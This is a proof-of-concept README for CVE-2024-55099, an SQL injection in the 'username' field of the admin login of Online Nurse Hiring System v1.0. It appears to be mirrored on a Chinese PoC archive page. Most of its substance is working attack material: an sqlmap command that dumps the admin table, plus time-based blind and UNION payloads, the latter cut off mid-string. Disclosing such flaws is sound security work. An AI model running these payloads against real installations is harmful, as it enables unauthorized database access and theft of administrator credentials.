关联漏洞
介绍
# CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability
+ Exploit Author: ugurkarakoc
# Vendor Homepage
+ https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql
# Software Link
+ https://phpgurukul.com/?sdm_process_download=1&download_id=17826
# Overview
+ Online-Nurse-Hiring-System-v1.0 is Insufficient input validation and sanitization of 'username' parameters can create a vulnerability to SQL injection attacks, enabling unauthorized access to the database and compromising system security.
# Vulnerability Details
+ CVE ID: CVE-2024-55099
+ Affected Version: Online-Nurse-Hiring-System-v1.0
+ Vulnerable File: /admin/index.php.
+ Parameter Names: username
+ Attack Type: Local
# References:
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
+ https://nvd.nist.gov/vuln/detail/CVE-2024-55099
# Description
+ The lack of proper input validation and sanitization on the 'username' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database
# Proof of Concept (PoC) :
+ `sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump`
```
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---
```
文件快照
[4.0K] /data/pocs/d292c2748732b764d4c60bdeb49771f8259d9229
└── [1.7K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。